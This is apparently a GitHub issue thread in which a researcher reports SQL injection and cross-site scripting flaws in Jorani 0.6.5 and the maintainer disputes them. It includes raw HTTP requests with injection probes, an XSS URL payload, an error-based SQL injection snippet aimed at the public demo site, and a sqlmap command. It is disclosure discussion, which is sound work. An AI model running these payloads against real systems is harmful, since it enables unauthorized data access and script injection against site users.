Multiple Vulnerabilities

[JavierOlmedo]

Hi,

The last version 0.6.5 has multiple critical vulnerabilities, please contact me to solve it.

Thank you!

[bbalet]

Hi,

Sorry to be rude, but I have received many similar messages that all end up by me wasting a lot of time:

• People running a security scanner without knowing how to configure it; what is false positive; etc.
• People listing CVE without checking if we are using the feature covered by the CVE.
• People making mistakes in configuring the system or a 3rd party provider such as LDAP.
• People giving general concepts without any practical application.

Plus your approach is odd. What do you mean by "multiple" ? Why should I contact you to solve these vulnerabilities ? It is an OSS, you should fill an issue or contact me directly by email (or push a PR).

So I am going to close this issue and ask you to provide facts and numbers.

[JavierOlmedo]

Example of vulnerabilities:

#1 SQLi (enddate parameter)
POST /jorani/leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: /
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/jorani/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 164
Cookie: wp-settings-time-1=1529879849; _ga=GA1.1.1206826520.1530452462; _utcpl=d66f04aebc05b818647e35827af8c710s1; wire_challenge=tD4NhtqOaauH%2F6JhAnhQjgDy36FLLvIF; language=c0298cb7f7f4378f459f575987ae508c924c00de9cf85a8d58a20d8536543b9ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22es%22%3B%7D; em_cdn_uid=t%3D1532802388596%26u%3Da955a24a2e764bb9bb7687ec76e7e814; csrf_cookie_jorani=0d1cad61640cc57dad8f244011bd7304; jorani_session=67oetch8m4dpaq2kqvo68vg9q3mfj7e4; PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03'&startdatetype=Morning&enddatetype=Afternoon&leave_id=

---

POST /jorani/leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: /
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/jorani/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 164
Cookie: wp-settings-time-1=1529879849; _ga=GA1.1.1206826520.1530452462; _utcpl=d66f04aebc05b818647e35827af8c710s1; wire_challenge=tD4NhtqOaauH%2F6JhAnhQjgDy36FLLvIF; language=c0298cb7f7f4378f459f575987ae508c924c00de9cf85a8d58a20d8536543b9ba%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22es%22%3B%7D; em_cdn_uid=t%3D1532802388596%26u%3Da955a24a2e764bb9bb7687ec76e7e814; csrf_cookie_jorani=0d1cad61640cc57dad8f244011bd7304; jorani_session=67oetch8m4dpaq2kqvo68vg9q3mfj7e4; PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03''&startdatetype=Morning&enddatetype=Afternoon&leave_id=

#2 XSS (language parameter)
/jorani/session/language?csrf_test_jorani=0d1cad61640cc57dad8f244011bd7304&last_page=session%2Flogin&language=enribn7%22%3e%3cscript%3ealert(1)%3c%2fscript%3elq0luluxxvu&login=&CipheredValue=

[bbalet]

The XSS vulnerability you gave as an example causes a JavaScript error and the exploiter cannot login, but no damage is done, no data is modified and the exploiter cannot elevate his privileges with this technique.

[bbalet]

For the SQL injection I am not sure about what result you got.

First, the exploiter needs:

1. To know the password of the application.
2. To know a leave request it can edit.
3. The MySQL backend is not properly configured with a SQL user dedicated to the database. For exemple, you are using a root db user.

Imagine that you connect to the demo: https://demo.jorani.org/

And then in the console you execute this code (you need to change the leave id so as to respect rule number 2):

$.ajax({
  type: "POST",
  url: 'https://demo.jorani.org/leaves/validate',
  data: {
	id:1478,
	type:'compensate',
	startdate:'2018-08-02',
	enddate:"2018-08-03') AND (SELECT 2138 FROM (SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(2138=2138,1))),0x716b716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND('WfLI'='WfLI'",
	startdatetype:'Morning',
	enddatetype:'Afternoon',
	leave_id:1478
  },
  done: function(data) {console.log(data)}
});

It is impossible to get a 200 OK code with the payload of your POC for two reasons:

• The input is sanitize here:

  jorani/application/controllers/Leaves.php

  Line 827 in 4b817d6

  $enddatetype = $this->input->post('enddatetype', TRUE); //Mandatory field checked by frontend

• Your SQL query is not well formed.

[JavierOlmedo]

Hi,

Test XSS (view PoC - anti-csrf not necessary)

Go to --> localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=

More info:
https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/

Test SQLi

Confirmed by Exploit-DB (Need user)
https://www.exploit-db.com/exploits/45340/

Use sqlmap to exploit with parameters:
sqlmap -r jorani-poc.req -p enddate --dbms=MySQL --dbs

More info:
https://hackpuntes.com/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/

[blablablabc]

Hi,

The latest stable version is still vulnerable to these vulnerabilities: https://github.com/bbalet/jorani/releases/download/v0.6.5/jorani-0.6.5.zip

I advise you to create a new archive that no longer contains these vulnerabilities.

Regards,

abc